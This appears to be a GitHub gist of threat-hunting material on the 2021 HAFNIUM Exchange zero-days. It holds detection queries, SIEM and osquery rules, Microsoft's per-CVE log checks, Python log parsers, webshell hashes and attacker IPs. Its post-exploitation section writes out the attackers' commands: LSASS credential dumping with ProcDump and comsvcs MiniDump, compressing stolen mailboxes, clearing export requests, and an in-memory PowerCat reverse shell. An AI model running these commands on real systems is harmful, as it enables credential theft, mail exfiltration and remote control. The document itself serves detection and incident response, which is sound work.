@zaneGittins
Created March 10, 2021 19:47

Exchange 0days

Resources

Post Exploitation Activity

  1. Covenant (C2 framework)
  2. Using ProcDump to dump LSASS process memory:
c:\windows\temp\procdump64 -accepteula -ma lsass.exe C:\windows\temp\lsass
  3. comsvcs.dll MiniDump to dump LSASS memory (the MiniDump export takes the lsass PID, an output path and the literal word full):
rundll32.exe C:\windows\system32\comsvcs.dll, MiniDump <lsass PID> C:\windows\temp\lsass.dmp full
  4. 7-Zip to compress stolen data (exported .pst mailboxes):
C:\ProgramData\7z a -t7z -r C:\ProgramData\it.zip C:\ProgramData\pst
  5. Adding the Exchange Management PowerShell snap-in to enumerate mailboxes, review export requests and clean up afterwards (snap-in name is Microsoft.Exchange.Management.PowerShell.SnapIn; PowerShell matches it case-insensitively):
Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; Get-Mailbox
Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; Get-MailboxExportRequest -ResultSize 100
Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; Remove-MailboxExportRequest -Confirm:$false
  6. Nishang Invoke-PowerShellTcpOneLineBind (bind shell)
  7. PowerCat reverse shell: download powercat.ps1 into memory, connect back to the listener and hand it a PowerShell process:
IEX (New-Object System.Net.WebClient).DownloadString('<powercat.ps1 URL>'); powercat -c <listener IP> -p <listener port> -e powershell

Data Lake Queries / Correlation Rules

(event_id: 4688 OR event_id: 1) AND process_name: ("powershell.exe" OR "PowerShell_ISE.exe") AND command_line: "*$client = New-Object System.Net.Sockets.TCPClient*"

(event_id: 4688 OR event_id: 1) AND process_name: ("powershell.exe" OR "PowerShell_ISE.exe") AND command_line: "*powercat*"

(event_id: 4688 OR event_id: 1) AND process_name: ("powershell.exe" OR "PowerShell_ISE.exe") AND command_line: "*Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn*"

(event_id: 4688 OR event_id: 1) AND process_name: "rundll32.exe" AND command_line: "*MiniDump*"

event_data.OriginalFileName:("psexec.c" OR "procdump" OR "procexp.exe")

parent_process_name: ('w3wp.exe' OR 'httpd.exe' OR 'nginx.exe' OR 'php-cgi.exe' OR 'tomcat.exe') AND process_name:('cmd.exe' OR 'sh.exe' OR 'bash.exe' OR 'powershell.exe' OR 'bitsadmin.exe')

AA Rules

Detect PowerShell executed with specific command-line parameters (command_line is lower-cased before matching so the snap-in name and the Nishang one-liner match regardless of how the attacker capitalised them):

customer-created-CsqjLzIVDD {
  RuleName = "HAFNIUM activity"
  RuleDescription = "HAFNIUM activity"
  ReasonTemplate = "HAFNIUM activity"
  AggregateReasonTemplate = "HAFNIUM activity"
  RuleType = "endpoint"
  RuleCategory = "Endpoint Activity"
  ClassifyIf = "true"
  RuleEventTypes = ["process-created"]
  Disabled = "false"
  Model = "FACT"
  FactFeatureName = "process_name"
  Score = "50"
  PercentileThreshold = "0.1"
  RuleExpression = """inList(toLower(process_name),'powershell.exe','powershell_ise.exe') && (contains(toLower(command_line),'$client = new-object system.net.sockets.tcpclient') || contains(toLower(command_line),'powercat') || contains(toLower(command_line),'add-pssnapin microsoft.exchange.management.powershell.snapin'))"""
  DependencyExpression = "NA"
}

Detect a process opening lsass.exe with the access masks typical of credential dumpers (requires Sysmon Event ID 10, ProcessAccess). 0x1fffff (PROCESS_ALL_ACCESS) is what ProcDump and comsvcs MiniDump request and 0x1010 is the Mimikatz default; legitimate software (AV/EDR agents, wmiprvse.exe, csrss.exe) also opens lsass, so tune by source process before alerting on this alone.

customer-created-UgVP7zNhx6 {
  RuleName = "LSASS process read access."
  RuleDescription = "LSASS process read access."
  ReasonTemplate = "LSASS process read access."
  AggregateReasonTemplate = "LSASS process read access."
  RuleType = "asset"
  RuleCategory = "Endpoint Activity"
  ClassifyIf = "true"
  RuleEventTypes = ["process-created",
    "process-alert"]
  Disabled = "FALSE"
  Model = "FACT"
  FactFeatureName = "process_name"
  Score = "50.0"
  PercentileThreshold = "0.1"
  RuleExpression = "inList(outcome,'0x1010','0x1fffff') && target_process_name = 'lsass.exe'"
  DependencyExpression = "NA"
}

Detect potential webshell activity (based on Sigma rule):

customer-created-R66RGlFeBd {
  RuleName = "Possible windows webshell activity"
  RuleDescription = "Possible windows webshell activity"
  ReasonTemplate = "Possible windows webshell activity"
  AggregateReasonTemplate = "Possible windows webshell activity"
  RuleType = "endpoint"
  RuleCategory = "Endpoint Activity"
  ClassifyIf = "true"
  RuleEventTypes = ["process-created"]
  Disabled = "false"
  Model = "FACT"
  FactFeatureName = "process_name"
  Score = "25"
  PercentileThreshold = "0.1"
  RuleExpression = "inList(toLower(parent_process_name), 'w3wp.exe', 'httpd.exe', 'nginx.exe', 'php-cgi.exe', 'tomcat.exe') && inList(toLower(process_name),'cmd.exe', 'sh.exe', 'bash.exe', 'powershell.exe', 'bitsadmin.exe')"
  DependencyExpression = "NA"
}

OsQuery

Detect a Nishang bind-shell listener (any PowerShell process holding a listening TCP port):

SELECT listening_ports.port, processes.name FROM listening_ports JOIN processes ON listening_ports.pid = processes.pid WHERE LOWER(processes.name) LIKE '%powershell%';

Detect the ProcDump EULA-accepted registry key (written per user the first time ProcDump runs, including with -accepteula; the key's modification time dates the first run):

SELECT datetime(mtime, 'unixepoch', 'localtime') AS EULA_accepted, path FROM registry WHERE path LIKE 'HKEY_USERS\%\Software\Sysinternals\ProcDump\EulaAccepted';

PowerShell

From the Microsoft HAFNIUM blog post, one check per CVE (run on the Exchange server; paths assume the default V15 install location):

CVE-2021-26855

Import-Csv -Path (Get-ChildItem -Recurse -Path "$env:PROGRAMFILES\Microsoft\Exchange Server\V15\Logging\HttpProxy" -Filter '*.log').FullName | Where-Object {  $_.AuthenticatedUser -eq '' -and $_.AnchorMailbox -like 'ServerInfo~*/*' } | select DateTime, AnchorMailbox

CVE-2021-26858

findstr /snip /c:"Download failed and temporary file" "%PROGRAMFILES%\Microsoft\Exchange Server\V15\Logging\OABGeneratorLog\*.log"

CVE-2021-26857

Get-EventLog -LogName Application -Source "MSExchange Unified Messaging" -EntryType Error | Where-Object { $_.Message -like "*System.InvalidCastException*" }

CVE-2021-27065

Select-String -Path "$env:PROGRAMFILES\Microsoft\Exchange Server\V15\Logging\ECP\Server\*.log" -Pattern 'Set-.+VirtualDirectory'
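The CVE-2021-26855 check above is the same logic implemented as a small log parser, so it can be run offline against copied HttpProxy logs or wired into a pipeline. This is an added example, not code from the gist or from Microsoft; the log sample is constructed and uses a reduced subset of the real HttpProxy columns, and the column names (DateTime, ClientIpAddress, AuthenticatedUser, AnchorMailbox) are the ones the Microsoft one-liner relies on. Exchange writes several `#` header lines before the data, with the column list on the `#Fields:` line, which is what the parser keys off.

```python
"""Flag CVE-2021-26855 (SSRF) indicators in Exchange HttpProxy logs.

Same rule as the Microsoft one-liner on this page: rows with an empty
AuthenticatedUser whose AnchorMailbox matches 'ServerInfo~*/*'.
"""
import csv
from fnmatch import fnmatchcase

# Constructed sample (reduced column set, not a real server log).
SAMPLE_LOG = r"""#Software: Microsoft Exchange Server
#Version: 15.01.2176.009
#Log-type: HttpProxy Logs
#Date: 2021-03-03T00:00:00.000Z
#Fields: DateTime,RequestId,ClientIpAddress,UrlStem,AuthenticatedUser,AnchorMailbox,HttpStatus
2021-03-03T01:10:11.000Z,1a2b,10.0.0.15,/owa/,CORP\alice,Sid~S-1-5-21-1-2-3-1001,200
2021-03-03T01:12:52.000Z,3c4d,203.0.113.7,/ecp/y.js,,ServerInfo~a]@exch01.corp.local:444/ecp/DDI/DDIService.svc/GetObject?msExchEcpCanary=abc,200
2021-03-03T01:13:03.000Z,5e6f,203.0.113.7,/owa/auth/x.js,,ServerInfo~localhost/autodiscover/autodiscover.xml?#,200
2021-03-03T01:15:20.000Z,7g8h,10.0.0.22,/autodiscover/autodiscover.xml,CORP\bob,Smtp~bob@corp.local,200
"""


def parse_httpproxy_log(text):
    """Return one dict per request row, keyed by the names on the #Fields line."""
    fields = None
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#"):
            if line.startswith("#Fields:"):
                fields = [f.strip() for f in line[len("#Fields:"):].split(",")]
            continue  # other '#' lines are metadata
        if fields is None:
            raise ValueError("data row before #Fields header")
        values = next(csv.reader([line]))
        if values == fields:  # defensive: skip a repeated header row if present
            continue
        rows.append(dict(zip(fields, values)))
    return rows


def is_ssrf_indicator(row):
    """Unauthenticated request whose anchor mailbox was rewritten to a server target."""
    unauthenticated = row.get("AuthenticatedUser", "") == ""
    # PowerShell -like is case-insensitive; lower-case before the glob match.
    anchor = row.get("AnchorMailbox", "").lower()
    return unauthenticated and fnmatchcase(anchor, "serverinfo~*/*")


def find_ssrf_hits(text):
    """(DateTime, ClientIpAddress, AnchorMailbox) for every matching row."""
    return [
        (r["DateTime"], r["ClientIpAddress"], r["AnchorMailbox"])
        for r in parse_httpproxy_log(text)
        if is_ssrf_indicator(r)
    ]


def summarize_by_client(text):
    """Count SSRF-pattern requests per source IP, the first pivot in triage."""
    counts = {}
    for _, ip, _ in find_ssrf_hits(text):
        counts[ip] = counts.get(ip, 0) + 1
    return counts


if __name__ == "__main__":
    for hit in find_ssrf_hits(SAMPLE_LOG):
        print(*hit)
    print(summarize_by_client(SAMPLE_LOG))
```

Point it at the concatenated contents of the HttpProxy log directory (all `*.log` files under the Autodiscover, Ecp, Ews, Mapi, Oab, Owa, PowerShell and Rpc subfolders) to get a per-IP count of unauthenticated ServerInfo~ requests, then pivot on those IPs in the IIS logs.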

Webshell Hashes

b75f163ca9b9240bf4b37ad92bc7556b40a17e27c2b8ed5c8991385fe07d17d0
097549cf7d0f76f0d99edf8b2d91c60977fd6a96e4b8c3c94b0b1733dc026d3e
2b6f1ebb2208e93ade4a6424555d6a8341fd6d9f60c25e44afe11008f5c1aad1
65149e036fff06026d80ac9ad4d156332822dc93142cf1a122b1841ec8de34b5
511df0e2df9bfa5521b588cc4bb5f8c5a321801b803394ebc493db1ef3c78fa1
4edc7770464a14f54d17f36dc9d0fe854f68b346b27b35a6f5839adf1f13f8ea
811157f9c7003ba8d17b45eb3cf09bef2cecd2701cedb675274949296a6a183d
1631a90eb5395c4e19c7dbcbf611bbe6444ff312eb7937e286e4637cb9e72944

IIS/WAF logs

Based on Sigma rule.

# Search for post requests with specific user agents.
method:"POST" AND userAgent: ("DuckDuckBot/1.0;+(+http://duckduckgo.com/duckduckbot.html)" OR "facebookexternalhit/1.1+(+http://www.facebook.com/externalhit_uatext.php)" OR "Mozilla/5.0+(compatible;+Baiduspider/2.0;++http://www.baidu.com/search/spider.html)" OR "Mozilla/5.0+(compatible;+Bingbot/2.0;++http://www.bing.com/bingbot.htm)" OR "Mozilla/5.0+(compatible;+Googlebot/2.1;++http://www.google.com/bot.html" OR "Mozilla/5.0+(compatible;+Konqueror/3.5;+Linux)+KHTML/3.5.5+(like+Gecko)+(Exabot-Thumbnails)" OR "Mozilla/5.0+(compatible;+Yahoo!+Slurp;+http://help.yahoo.com/help/us/ysearch/slurp)" OR "Mozilla/5.0+(compatible;+YandexBot/3.0;++http://yandex.com/bots)" OR "Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/51.0.2704.103+Safari/537.36")

method:"POST" AND userAgent:("ExchangeServicesClient/0.0.0.0" OR "Googlebot/2.1+(+http://www.googlebot.com/bot.html)" OR "Mozilla/5.0+(compatible;+Baiduspider/2.0;++http://www.baidu.com/search/spider.html)")

# Search for POSTs to the paths the web shells were dropped under (OWA/ECP static-content directories)

method:"POST" AND uri_path:("*/owa/auth/Current/*" OR "*/ecp/default.flt" OR "*/ecp/main.css" OR "*.js*")
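The two IIS queries above, run as code over raw W3C-format IIS log lines. This is an added example, not from the gist or the Sigma rule it is based on; the log lines are constructed, and only a subset of the page's user-agent strings is included. IIS replaces spaces inside the User-Agent with `+`, which is why the indicator strings on this page carry `+` and why they are matched verbatim against the raw field with no decoding.

```python
"""Flag POSTs in IIS W3C logs that match the ProxyLogon web-shell indicators.

Mirrors the two log queries on this page: POST plus a known scanner/bot
User-Agent, or POST to the OWA/ECP paths the web shells were written under.
"""
from fnmatch import fnmatchcase

# Subset of the user-agent strings listed on this page (raw IIS form, '+' for space).
SUSPICIOUS_UAS = {
    "ExchangeServicesClient/0.0.0.0",
    "DuckDuckBot/1.0;+(+http://duckduckgo.com/duckduckbot.html)",
    "Mozilla/5.0+(compatible;+Googlebot/2.1;++http://www.google.com/bot.html",
    "Mozilla/5.0+(compatible;+Baiduspider/2.0;++http://www.baidu.com/search/spider.html)",
}
# Path globs from the same rule; matched against the lower-cased cs-uri-stem.
SUSPICIOUS_PATHS = ("*/owa/auth/current/*", "*/ecp/default.flt", "*/ecp/main.css", "*.js*")

# Constructed sample, not a real server log.
SAMPLE_IIS_LOG = r"""#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2021-03-03 01:10:00
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2021-03-03 01:10:11 10.0.0.5 GET /owa/ - 443 CORP\alice 10.0.0.15 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36 - 200 0 0 120
2021-03-03 01:12:52 10.0.0.5 POST /ecp/y.js - 443 - 203.0.113.7 ExchangeServicesClient/0.0.0.0 - 200 0 0 312
2021-03-03 01:13:03 10.0.0.5 POST /owa/auth/Current/themes/resources/logon.css - 443 - 203.0.113.7 Mozilla/5.0+(compatible;+Googlebot/2.1;++http://www.google.com/bot.html - 200 0 0 45
2021-03-03 01:14:30 10.0.0.5 POST /owa/auth.owa - 443 - 10.0.0.22 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36 - 302 0 0 88
"""


def parse_iis_w3c(text):
    """Yield one dict per request line, keyed by the names on the #Fields line."""
    fields = None
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#"):
            if line.startswith("#Fields:"):
                fields = line[len("#Fields:"):].split()
            continue
        if fields is None:
            raise ValueError("request line before #Fields header")
        values = line.split(" ")  # W3C fields never contain spaces ('+' instead)
        if len(values) != len(fields):
            raise ValueError(f"field count mismatch: {line!r}")
        yield dict(zip(fields, values))


def classify_post(req):
    """Return the reasons a request is suspicious; an empty list means benign."""
    if req["cs-method"].upper() != "POST":
        return []
    reasons = []
    if req["cs(User-Agent)"] in SUSPICIOUS_UAS:
        reasons.append("user-agent")
    stem = req["cs-uri-stem"].lower()
    if any(fnmatchcase(stem, pattern) for pattern in SUSPICIOUS_PATHS):
        reasons.append("path")
    return reasons


def find_webshell_posts(text):
    """(timestamp, client IP, uri-stem, reasons) for every suspicious POST."""
    hits = []
    for req in parse_iis_w3c(text):
        reasons = classify_post(req)
        if reasons:
            hits.append((f'{req["date"]} {req["time"]}', req["c-ip"], req["cs-uri-stem"], reasons))
    return hits


if __name__ == "__main__":
    for hit in find_webshell_posts(SAMPLE_IIS_LOG):
        print(*hit)
```

The normal logon POST to /owa/auth.owa is left alone; a POST to a .js or .css file under the OWA/ECP static directories is the thing worth pulling the request body and the on-disk file for, since those paths should never receive POSTs.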

IPs

103.77.192.219
104.140.114.110
104.250.191.110
108.61.246.56
149.28.14.163
157.230.221.198
167.99.168.251
185.250.151.72
192.81.208.169
203.160.69.66
211.56.98.146
5.254.43.18
80.92.205.81